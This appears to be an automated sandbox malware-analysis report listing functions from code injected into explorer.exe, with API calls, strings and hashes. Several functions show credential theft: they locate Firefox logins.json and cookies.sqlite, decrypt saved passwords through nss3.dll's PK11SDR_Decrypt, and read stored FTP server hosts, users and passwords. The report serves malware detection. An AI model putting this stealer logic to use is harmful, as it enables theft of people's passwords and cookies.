Function 000C4980 Relevance: 4.5, APIs: 3, Instructions: 8comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000C4982
OleUninitialize.OLE32 ref: 000C4991
ExitProcess.KERNEL32 ref: 000C4999

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: f190b4ae96bff76c6d5d6b45495268c2113a091e65367e04bea3377f2c5c46ea
Instruction ID: 34d4e73defa7c16e48b19ff63dcdcc16b587e3047f55ad6fa2c725dea481038f
Opcode Fuzzy Hash: f190b4ae96bff76c6d5d6b45495268c2113a091e65367e04bea3377f2c5c46ea
Instruction Fuzzy Hash: DCC09B303451119FDA943BF16E1DF9D3964FF54703F00800CF609C4492DF7240408622

Uniqueness

Uniqueness Score: -1.00%

Function 000C9DD6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 000C9E06

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 000C9E1C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 48c4bc3a00a3b7358bb3d8cdf4a85067dd4f0f2a30fcfccaf6bce78b6f5faaa3
Instruction ID: e64d388684032a491df42c3dbbcf3a21afd6507b6e55ebe1c095b0a932bf564c
Opcode Fuzzy Hash: 48c4bc3a00a3b7358bb3d8cdf4a85067dd4f0f2a30fcfccaf6bce78b6f5faaa3
Instruction Fuzzy Hash: 8BF0F672609241BAE3309B90DC4DF2F77ECE7B0785F24082DF98697240E3705C418260

Uniqueness

Uniqueness Score: -1.00%

Function 000C1CC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1CDE

Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1C5A,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA), ref: 000C1020
Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027

Part of subcall function 000C1BAD: RegOpenKeyExW.ADVAPI32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1BE6
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C04
Part of subcall function 000C1BAD: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1C3D
Part of subcall function 000C1BAD: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1CAA,PortNumber,00000000,00000000), ref: 000C1C60

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 000C1D08

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: eb771c8b8efc0ce12eca49cd20102d1ad08c552d25042253461234d043243ea7
Instruction ID: 379d23ec98cfa7dc9ad0c36c6780009c1bcf3b4ec5a41bbbb24b74db62f013ff
Opcode Fuzzy Hash: eb771c8b8efc0ce12eca49cd20102d1ad08c552d25042253461234d043243ea7
Instruction Fuzzy Hash: 95F0B43670064C37D615A729DC84FFF769ECBD33A5316002DF42A83203DE23AC811264

Uniqueness

Uniqueness Score: -1.00%

Function 000C9CB5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D10000,00000000,?), ref: 000C9CC3

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 000C9CDB

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 70fc90e02ada6ac37fddda43b3fdede4714e79eb78c3fc80f87d43d4bd7f73c6
Instruction ID: 3df4fa115ebf006f9ca6f17dfb8f9d833e548a50687363b7279f5936ee7b33a0
Opcode Fuzzy Hash: 70fc90e02ada6ac37fddda43b3fdede4714e79eb78c3fc80f87d43d4bd7f73c6
Instruction Fuzzy Hash: 4FE0C233A092107BC2226784AC05F6FB7B9EBA5F10F010019FA06A3660C3309CA287A2

Uniqueness

Uniqueness Score: -1.00%

Function 000C1D32 Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1D4A
CloseHandle.KERNEL32(00000000), ref: 000C1D57

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a3f2e46196787ea2733944053df48d0ac4e94d074b637357f16b1a336766e6ca
Instruction ID: 064c8840b1c6bf3c3e7f25d60dbadab47e41e44471dbc29d14a06daabfd8648c
Opcode Fuzzy Hash: a3f2e46196787ea2733944053df48d0ac4e94d074b637357f16b1a336766e6ca
Instruction Fuzzy Hash: 88D0173124393062D9B927757D08FDB6E9CDF47AB5B054A18F51AD14E0D2258D8282E0

Uniqueness

Uniqueness Score: -1.00%

Function 000C9CF6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(02D10000,00000000,?), ref: 000C9D06

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 000C9D1C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: ffc513edb09c82ec88cbd5443c37efcfdc0ae1741665c8bcd190cef3bbac08ed
Instruction ID: 407c22af79ab323dba3fcbbbe7189e20ff703e49a86e15f384d7e5755f88b974
Opcode Fuzzy Hash: ffc513edb09c82ec88cbd5443c37efcfdc0ae1741665c8bcd190cef3bbac08ed
Instruction Fuzzy Hash: 8BD05B7750934677D211AB549C15F3F77BCEBA5F00F14041CF206624B9D3B558E29721

Uniqueness

Uniqueness Score: -1.00%

Function 000C12F1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 000C1303

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: df25b5c2f36da18ac3b906d37a82cfacf4f091de16049ce41ad5ee958e837441
Instruction ID: 28e610a862677fbe42b72cff5caa3dd4c69e58ad294fb54581a5f640946e6387
Opcode Fuzzy Hash: df25b5c2f36da18ac3b906d37a82cfacf4f091de16049ce41ad5ee958e837441
Instruction Fuzzy Hash: 751110B5A01209AFDB14CFA9E984EEEBBFCEB49350B104029F915E3651E731DE418B60

Uniqueness

Uniqueness Score: -1.00%

Function 000C183F Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C184C

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: f2d181a0bc283bf4a0dda378fda38404009e65051ff2bb9af6d09d9875c2338b
Instruction ID: 27081b9f86b08d9508d658560b46ad7f81691b66d93751e3d62ebf546a0684b4
Opcode Fuzzy Hash: f2d181a0bc283bf4a0dda378fda38404009e65051ff2bb9af6d09d9875c2338b
Instruction Fuzzy Hash: 61C01230125222DEEB201B308A09BCA36E6AF2A7A2F02483DE18099080EAB408C08690

Uniqueness

Uniqueness Score: -1.00%

Function 000C104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,000C1730), ref: 000C1056

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
Instruction ID: 6ced8ba81a80a37abd1a230f096ca294a1d38799ad107e7e8dc3420ce8496934
Opcode Fuzzy Hash: 89054cb220ee4bceeb5c72cf07b93ffc29755a2f9b399f58ca72f882ddf7ed5f
Instruction Fuzzy Hash: 61A002F07D67007AFD6D5762AF1FF5529389744F02F114244B34D7C4D095E97540852D

Uniqueness

Uniqueness Score: -1.00%

Function 000C105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,000C4869,?,?,00000000,?,?,?,?,000C4974,?), ref: 000C1065

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 9a3d3e7597912a1f2e2e804924053d320e67958b5a356ab2611909abaad8a3a2
Instruction ID: c2dbdd1f2c75a3cd39fdb90e5e5d2d11ad78f713944b99e9b9fc4d994b11f82c
Opcode Fuzzy Hash: 9a3d3e7597912a1f2e2e804924053d320e67958b5a356ab2611909abaad8a3a2
Instruction Fuzzy Hash: 12A0027069070076ED7857605E0EF4577147781B02F3485447241695D1CAA6B044CA18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00114246 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 00114310
memcmp.NTDLL ref: 0011456D
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00114611

Strings

localhost, xrefs: 0011430B
%s mode not allowed: %s, xrefs: 001145DE
no such vfs: %s, xrefs: 0011463D
cach, xrefs: 001144EA
invalid uri authority: %.*s, xrefs: 00114321
cache, xrefs: 00114508
access, xrefs: 00114533
file, xrefs: 00114282
mode, xrefs: 00114520
no such %s mode: %s, xrefs: 00114592

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 6b6e502bb50a65f139b252b5423cec2df7623ddead735137eb49b6d7a43899ec
Instruction ID: 8e89a7d7fa4016ebae746b1863496c5eecec972b82fa807d2cb4a30dc9881fe1
Opcode Fuzzy Hash: 6b6e502bb50a65f139b252b5423cec2df7623ddead735137eb49b6d7a43899ec
Instruction Fuzzy Hash: AAC1E070A083518BDB3CCF2884907FAB7E2AB99B14F19093DF8D587642D734D8C58796

Uniqueness

Uniqueness Score: -1.00%

Function 000C2C85 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,00116574), ref: 000C1B5C

FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 000C2CAD
lstrcmpiW.KERNEL32(?,001162BC), ref: 000C2CD3
lstrcmpiW.KERNEL32(?,001162C0), ref: 000C2CEB

Part of subcall function 000C1B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C1B8C

StrStrIW.SHLWAPI(00000000,logins.json), ref: 000C2D57
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 000C2D86
FindNextFileW.KERNEL32(00000000,00000010), ref: 000C2DB3
FindClose.KERNEL32(00000000), ref: 000C2DC2

Strings

\*.*, xrefs: 000C2C85
cookies.sqlite, xrefs: 000C2D80
logins.json, xrefs: 000C2D51

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 70c1d512485da0f7fafcc56b35d0f923683e016186b899767bb7c7a83f694412
Instruction ID: d9554341e83c2f7a1051cfae8ddee75883558c6bbb6150a0cd765c094f404bd0
Opcode Fuzzy Hash: 70c1d512485da0f7fafcc56b35d0f923683e016186b899767bb7c7a83f694412
Instruction Fuzzy Hash: 683190307043009BCB58AB309985FFE72EAABDA740B14453CF846D3693EF7ACD459662

Uniqueness

Uniqueness Score: -1.00%

Function 000E5D16 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 000C68B8: memset.NTDLL ref: 000C68D3

memset.NTDLL ref: 000E5D61

Strings

foreign key, xrefs: 000E5EB1
indexed, xrefs: 000E5EF6
cannot open virtual table: %s, xrefs: 000E5DB8
cannot open view: %s, xrefs: 000E5E01
no such column: "%s", xrefs: 000E607F
cannot open %s column for writing, xrefs: 000E6063
cannot open table without rowid: %s, xrefs: 000E5DDD

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: e72c9e7a735833ac44efc05d42243b3727b53e1ba293a1df132a2de294850e88
Instruction ID: e79c3452acbea7a1eb0c7db2bdf3f9c49b77e93fcd83cd2db0f667318bc79fb1
Opcode Fuzzy Hash: e72c9e7a735833ac44efc05d42243b3727b53e1ba293a1df132a2de294850e88
Instruction Fuzzy Hash: E5C18C706047419FCB58DF26C881A6FB7E2AF98704F14892DF88997342DB31E952CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000C2282 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 000C2297
_alldiv.NTDLL(?,?,00989680,00000000), ref: 000C22AA
wsprintfA.USER32 ref: 000C22BF

Strings

%li, xrefs: 000C22B9

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 7a3de5de6d6e432e0377314060dab32b0ddbb4bb4f8176aadf8d91d7c1533b13
Instruction ID: 11d6331b71cb4d9e1f75aaa160984c5ff3ac7b5df341c67286557bf9b4784c26
Opcode Fuzzy Hash: 7a3de5de6d6e432e0377314060dab32b0ddbb4bb4f8176aadf8d91d7c1533b13
Instruction Fuzzy Hash: 24E0D832A4120877C7143BB89D06FEF7F6DCB80B55F0042A1F904B2186D6738A9483D5

Uniqueness

Uniqueness Score: -1.00%

Function 000C424E Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 289stringcommemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(001162A0,00000000,00000001,00116290,?), ref: 000C426D
SysAllocString.OLEAUT32(?), ref: 000C42B8
lstrcmpiW.KERNEL32(RecentServers,?), ref: 000C437C
lstrcmpiW.KERNEL32(Servers,?), ref: 000C438B
lstrcmpiW.KERNEL32(Settings,?), ref: 000C439A

Part of subcall function 000C122F: lstrlenW.KERNEL32(?,7556D5B5,00000000,?,00000000,?,000C44F1), ref: 000C123B
Part of subcall function 000C122F: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C125D
Part of subcall function 000C122F: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 000C127F

lstrcmpiW.KERNEL32(Server,?), ref: 000C43CC
lstrcmpiW.KERNEL32(LastServer,?), ref: 000C43DB
lstrcmpiW.KERNEL32(Host,?), ref: 000C4465
lstrcmpiW.KERNEL32(Port,?), ref: 000C4487
lstrcmpiW.KERNEL32(User,?), ref: 000C44AD
lstrcmpiW.KERNEL32(Pass,?), ref: 000C44D3
wsprintfW.USER32 ref: 000C452C

Strings

Settings, xrefs: 000C4395
Host, xrefs: 000C4460
Pass, xrefs: 000C44CE
Server, xrefs: 000C43C7
Servers, xrefs: 000C4386
Port, xrefs: 000C4482
User, xrefs: 000C44A8
LastServer, xrefs: 000C43D6
%s:%s, xrefs: 000C4526
RecentServers, xrefs: 000C4377

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: afea3612f79c1d1eb46f8292fed4ffa801435a0b155586d76a07d29e82c0679f
Instruction ID: ae15d3dca649929958227ff6be8d66c390da99d4dc0d9e4dca841369d844c2e3
Opcode Fuzzy Hash: afea3612f79c1d1eb46f8292fed4ffa801435a0b155586d76a07d29e82c0679f
Instruction Fuzzy Hash: C5B1F271204302AFD744DF64C894F6AB7E9BFC9748F00896CF5858B261DB72E946CB62

Uniqueness

Uniqueness Score: -1.00%

Function 000C2620 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

Part of subcall function 000C1090: lstrlenW.KERNEL32(?,?,00000000,000C19AD), ref: 000C1097
Part of subcall function 000C1090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000C10A8

Part of subcall function 000C1B7C: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2E1F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C1B8C

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 000C2673
SetCurrentDirectoryW.KERNEL32(00000000), ref: 000C267A
LoadLibraryW.KERNEL32(00000000), ref: 000C26D3
SetCurrentDirectoryW.KERNEL32(?), ref: 000C26E0
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 000C2701
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 000C270E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000C271B
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000C2728
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000C2735
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000C2742
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000C274F

Part of subcall function 000C1AD3: lstrlen.KERNEL32(?,?,?,?,00000000,000C28F3), ref: 000C1AF3
Part of subcall function 000C1AD3: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C28F3), ref: 000C1AF8
Part of subcall function 000C1AD3: lstrcat.KERNEL32(00000000,?), ref: 000C1B0E
Part of subcall function 000C1AD3: lstrcat.KERNEL32(00000000,00000000), ref: 000C1B12

Strings

NSS_Shutdown, xrefs: 000C2703
nss3.dll, xrefs: 000C2680
PK11_FreeSlot, xrefs: 000C2744
PK11_GetInternalKeySlot, xrefs: 000C271D
sql:, xrefs: 000C279B
PK11_Authenticate, xrefs: 000C272A
SECITEM_FreeItem, xrefs: 000C2710
NSS_Init, xrefs: 000C26FB
PK11SDR_Decrypt, xrefs: 000C2737

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: c4516ccae1719896cfe5912dc5e2c7dfc8b8da7993da74c5825bdf41e808c632
Instruction ID: 42f3c4940c3d9c159c9f61d5dafe88ec9fbdb40ea5fc055d51caf5a5e74c68df
Opcode Fuzzy Hash: c4516ccae1719896cfe5912dc5e2c7dfc8b8da7993da74c5825bdf41e808c632
Instruction Fuzzy Hash: 1D412535A04355ABCB28EF355E84EEE7AE99B96740710013EF801D3A93DB798C868B51

Uniqueness

Uniqueness Score: -1.00%

Function 000C5C68 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 000C5A03: memset.NTDLL ref: 000C5A15

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C5EEF
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C5EFA
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 000C5F21
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C5F9C
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 000C5FC3
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 000C5FCF

Strings

%06.3f, xrefs: 000C6037
%02d, xrefs: 000C5E47, 000C5FE1
%lld, xrefs: 000C5F30
%.16g, xrefs: 000C5E85
W, xrefs: 000C5FA1
%03d, xrefs: 000C6001
%04d, xrefs: 000C5E24

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: d8026cb22fb9de7a4d16e6f64dd5f72fd807dcff7aefa0134a6a234625c9391f
Instruction ID: 9eec33537216a10b68ba962436ba96b367e6faf093d9fa65317e6615e720f81a
Opcode Fuzzy Hash: d8026cb22fb9de7a4d16e6f64dd5f72fd807dcff7aefa0134a6a234625c9391f
Instruction Fuzzy Hash: EBB19176908B42ABD7399F24CC89F7F7BD4EB80345F24095DF483A61D2E721ED908A91

Uniqueness

Uniqueness Score: -1.00%

Function 000DD0BA Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 000DD132

Strings

k(%d, xrefs: 000DD0FC
BINARY, xrefs: 000DD12C
%lld, xrefs: 000DD1D8
%s(%d), xrefs: 000DD1B9
(blob), xrefs: 000DD224
NULL, xrefs: 000DD21D
,%d, xrefs: 000DD252
%.16g, xrefs: 000DD1F3
(%.20s), xrefs: 000DD198
program, xrefs: 000DD278
,%s%s, xrefs: 000DD15C
vtab:%p, xrefs: 000DD231

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: 8a7965e90ef2d91f051c241d5039dcb966237de84d3b76dda87495014a2b378f
Instruction ID: 1d8d083463c8c787c9e8d3ee89a668f35279e7693dcbe68769d4ea38d5c143ad
Opcode Fuzzy Hash: 8a7965e90ef2d91f051c241d5039dcb966237de84d3b76dda87495014a2b378f
Instruction Fuzzy Hash: D6510331508300ABC725DF90CC42EBAB7E6FB95300F14886BF9569B342EB31E845CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000C2A68 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C2C42

Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C1215,?,?,00000001,00000000,?), ref: 000C1003
Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000C2B51
lstrlen.KERNEL32(00000000), ref: 000C2B5C
wsprintfA.USER32 ref: 000C2BA8
lstrlen.KERNEL32(00000000), ref: 000C2BB4
lstrcat.KERNEL32(00000000,00000000), ref: 000C2BDC
lstrlen.KERNEL32(00000000,?,?), ref: 000C2C09

Strings

COOKIES, xrefs: 000C2C14, 000C2C1B, 000C2C21
TRUE, xrefs: 000C2B83
%sTRUE%s%s%s%s%s, xrefs: 000C2BA2
FALSE, xrefs: 000C2B76

Memory Dump Source

Source File: 00000012.00000002.1150604605.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c1000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 4919b66b9650529c3346a5d0149243adfe198efc2eb4270d0ea5a26e655db504
Instruction ID: 0b98ef2d696ee63f54b59a467485f7dbe993be7da7cee8cf6e5a831df752796f
Opcode Fuzzy Hash: 4919b66b9650529c3346a5d0149243adfe198efc2eb4270d0ea5a26e655db504
Instruction Fuzzy Hash: BB519B702083869BD729EF249891FAF77E9AF85344F04482CF9819B653DB35DC8AC752

Uniqueness

Uniqueness Score: -1.00%

Function 000C2E25 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000C1B1B: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C307C), ref: 000C1B3B
Part of subcall function 000C1B1B: lstrlenW.KERNEL32(00116574,?,?,000C307C), ref: 000C1B40
Part of subcall function 000C1B1B: lstrcatW.KERNEL32(00000000,?), ref: 000C1B58
